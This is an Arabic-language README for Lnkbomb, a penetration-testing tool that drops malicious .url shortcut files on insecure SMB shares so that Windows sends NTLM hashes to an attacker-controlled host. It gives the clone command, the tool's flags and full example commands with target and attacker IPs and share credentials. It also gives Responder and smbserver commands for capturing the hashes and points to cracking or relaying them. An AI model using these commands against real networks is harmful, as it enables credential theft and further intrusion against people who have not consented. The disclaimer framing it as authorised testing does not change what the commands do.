
مولد اختصارات خبيث لجمع تجزئات NTLM من مشاركات الملفات غير الآمنة.
تُستخدم أداة Lnkbomb لرفع ملفات الاختصار الخبيثة إلى مشاركات الملفات غير الآمنة. توجد الثغرة بسبب قيام Windows بالبحث عن ملف أيقونة لربطه بملف الاختصار. يمكن توجيه ملف الأيقونة هذا إلى جهاز مختبر الاختراق الذي يقوم بتشغيل Responder أو smbserver لجمع تجزئات NTLMv1 أو NTLMv2 (اعتمادًا على تكوين جهاز الضحية). يمكن للمختبر بعد ذلك محاولة كسر هذه التجزئات المجمعة دون اتصال باستخدام أداة مثل Hashcat، أو ترحيلها إلى أداة مثل ntlmrelayx لمزيد من الاستغلال.
يتم رفع ملف الحمولة مباشرة إلى الملف غير الآمن الذي يحدده المختبر في سطر الأوامر. كما يقوم المختبر بتضمين عنوان IP الخاص به، والذي يُكتب في الحمولة.
الإصدار 2.0 هو إعادة بناء كاملة للأداة ويستخدم مكتبة pysmb، مما يسمح بإسقاط الحمولات بدون مصادقة ومعها.
تثبيت Lnkbomb
لاحظ أن المشروع يعمل باستمرار في بيئة Windows. قد يواجه مشكلات في Linux.
git clone https://github.com/dievus/lnkbomb.git
قم بتغيير الدليل إلى lnkbomb وشغل:
python3 lnkbomb.py -h
سيؤدي هذا إلى إظهار قائمة المساعدة، والتي تحتوي على العلامات التالية:
-h, --help - Lists the help options
-t, --target - Specifies the target IP address
-a, --attacker - Specifies the tester's attack machine IP address
-r, --recover - Used to remove the payload when testing is completed (ex. -r payloadname.url)
-w, --windows - New command - required for setting appropriate ports for Windows shares
-l, --linux - New command - required for setting appropriate ports for Linux shares
-n, --netbios - New command - netbios name for targeted Windows machines must be included
أمثلة على الأوامر الكاملة:
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url
ستحتاج إلى استخدام أداة مثل Responder أو smbserver لالتقاط تجزئة NTLM.
responder -I eth0 -dwFP -v
أو
smbserver.py . . -smb2support
يرجى مراعاة أن هذه الأداة مخصصة لأغراض الاختراق الأخلاقي واختبار الاختراق فقط. لا أؤيد أي سلوك يتضمن اختبار أهداف ليس لديك الإذن باختبارها حاليًا.
قد تعمل هذه الأداة أو لا تعمل اعتمادًا على تصحيحات الهدف وإصداراته. قد تختلف تجربة المستخدم.
أعلم أنها اختصارات .url وليست امتدادات .lnk. أفعل ذلك لإثارة حماستك.